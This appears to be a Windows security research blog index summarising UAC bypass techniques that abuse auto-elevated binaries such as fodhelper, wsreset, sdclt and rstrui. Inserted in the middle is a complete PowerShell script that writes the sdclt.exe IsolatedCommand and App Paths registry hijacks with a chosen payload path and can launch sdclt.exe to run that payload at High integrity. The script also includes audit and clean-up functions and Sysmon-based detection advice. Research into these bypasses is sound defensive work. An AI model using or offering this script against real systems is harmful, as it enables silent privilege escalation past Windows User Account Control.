RESEARCHING RSTRUI PROCESS

Rstrui.exe is a signed Microsoft executable that handles the System Restore features. Its manifest has the “autoElevate” property set to true, which means that for a member of the Administrators group it starts at High integrity level without a UAC prompt. While playing around with Process Monitor from Sysinternals, I found out that rstrui.exe accepts command line arguments; I focused on the “/RUNONCE” argument.

Read More

UIACCESS UAC BYPASS

In these examples we start a host process (msra.exe) and steal its UIAccess token. We downgrade the token's integrity level from Medium+ to Medium and use it to spawn a new process (uihack.exe) with the UIAccess flag set. Because UIAccess exempts that process from UIPI, we can now send keyboard events to elevated processes.

Read More

FODHELPER UAC BYPASS

Fodhelper.exe is an auto-elevated executable signed by Microsoft. It was introduced in Windows 10 (build 10240) to manage optional features, such as keyboard settings.

Read More

WSRESET UAC BYPASS

WSReset.exe is used to reset the Windows Store cache and settings. The executable is signed by Microsoft and has the “autoElevate” property set to true in its manifest.

Read More

SDCLT UAC BYPASS (IsolatedCommand)

Sdclt.exe auto-elevates, so it runs at High IL by default. Because the elevated process resolves the “runas” verb of the exefile class through the user-writable HKCU\Software\Classes hive, that per-user class registration can be hijacked to spawn our executable at High IL. We need to set the IsolatedCommand value under “HKCU\Software\Classes\exefile\shell\runas\command” to the full path of our executable.

Read More

SDCLT UAC BYPASS (App Paths)

Sdclt.exe auto-elevates, so it runs at High IL by default. When it launches control.exe it resolves the path through the App Paths registry keys and consults the user-writable HKCU entry, so a per-user App Path can be hijacked to spawn our executable at High IL. We need to set the default value of “HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe” to the full path of our executable.

Read More
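Both sdclt entries above come down to writing one value under HKCU and then starting sdclt.exe. The PowerShell below is an added example, not code from the original posts: it stages either hijack, audits the two keys (useful on the defensive side too, since neither exists in a clean user profile) and removes them again. It assumes the caller is a member of Administrators running at Medium IL with UAC at its default level, that the target build still lets sdclt.exe consult these HKCU keys, and that the payload path exists. The function and parameter names and the trigger command lines (sdclt.exe /KickOffElev for the IsolatedCommand variant, plain sdclt.exe for App Paths) are this example's own assumptions; check the linked posts for the exact invocation.

```powershell
# Added example, not code from the original posts. Stages, audits and removes the
# per-user registry values the two sdclt.exe UAC bypasses rely on.
# Assumptions (not stated on the page): caller is an Administrators member at
# Medium IL, UAC at default level, sdclt.exe on this build still reads HKCU,
# $Payload points at an existing executable. Names and triggers are mine.

$SdcltHijacks = @{
    # sdclt.exe /KickOffElev -> exefile "runas" verb resolved from HKCU\Software\Classes
    IsolatedCommand = @{
        Key     = 'HKCU:\Software\Classes\exefile\shell\runas\command'
        Name    = 'IsolatedCommand'
        Trigger = @('sdclt.exe', '/KickOffElev')
    }
    # sdclt.exe -> control.exe, looked up through the user's App Paths entry first
    AppPaths = @{
        Key     = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe'
        Name    = '(default)'
        Trigger = @('sdclt.exe')
    }
}

function Get-SdcltHijack {
    # Audit view: a clean user profile has neither key, so any hit is suspicious.
    foreach ($variant in $SdcltHijacks.Keys) {
        $h = $SdcltHijacks[$variant]
        $data = $null
        if (Test-Path -LiteralPath $h.Key) {
            $data = (Get-ItemProperty -LiteralPath $h.Key -ErrorAction SilentlyContinue).($h.Name)
        }
        [pscustomobject]@{
            Variant = $variant
            Key     = $h.Key
            Name    = $h.Name
            Present = -not [string]::IsNullOrEmpty([string]$data)
            Data    = $data
        }
    }
}

function Set-SdcltHijack {
    param(
        [Parameter(Mandatory)][ValidateSet('IsolatedCommand', 'AppPaths')][string]$Variant,
        [Parameter(Mandatory)][ValidateScript({ Test-Path -LiteralPath $_ -PathType Leaf })][string]$Payload,
        [switch]$Launch
    )
    $h = $SdcltHijacks[$Variant]
    # HKCU is writable at Medium IL; the auto-elevated sdclt.exe reads the same
    # hive back under the same user, which is the whole bug.
    New-Item -Path $h.Key -Force | Out-Null
    Set-ItemProperty -LiteralPath $h.Key -Name $h.Name -Value $Payload
    if ($Launch) {
        $exe       = $h.Trigger[0]
        $arguments = @($h.Trigger | Select-Object -Skip 1)
        if ($arguments.Count -gt 0) { Start-Process -FilePath $exe -ArgumentList $arguments }
        else                        { Start-Process -FilePath $exe }
    }
}

function Remove-SdcltHijack {
    # Clean-up: remove only the keys this example creates, then report what is left.
    $paths = @('HKCU:\Software\Classes\exefile\shell\runas', $SdcltHijacks.AppPaths.Key)
    foreach ($p in $paths) {
        if (Test-Path -LiteralPath $p) { Remove-Item -LiteralPath $p -Recurse -Force }
    }
    Get-SdcltHijack | Where-Object Present
}

# Usage:
#   Set-SdcltHijack -Variant IsolatedCommand -Payload 'C:\Users\Public\payload.exe' -Launch
#   Get-SdcltHijack | Format-Table Variant, Present, Data
#   Remove-SdcltHijack
```

Both variants leave a persistent artefact in the user's hive, so monitoring registry value writes to these two paths (Sysmon event 13, for example) catches them, and the audit function above is a cheap spot check on a workstation. Newer Windows 10 builds have changed how sdclt.exe performs these lookups, so verify on the target build before relying on either variant.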

SDCLT UAC BYPASS

Sdclt.exe is a Microsoft executable introduced in Windows 7 (build 7600) that lets users create backups or restore from one. It is signed by Microsoft and has the “autoElevate” property set to true in its manifest; you can verify this with Sigcheck from Sysinternals (sigcheck -m sdclt.exe dumps the manifest).

Read More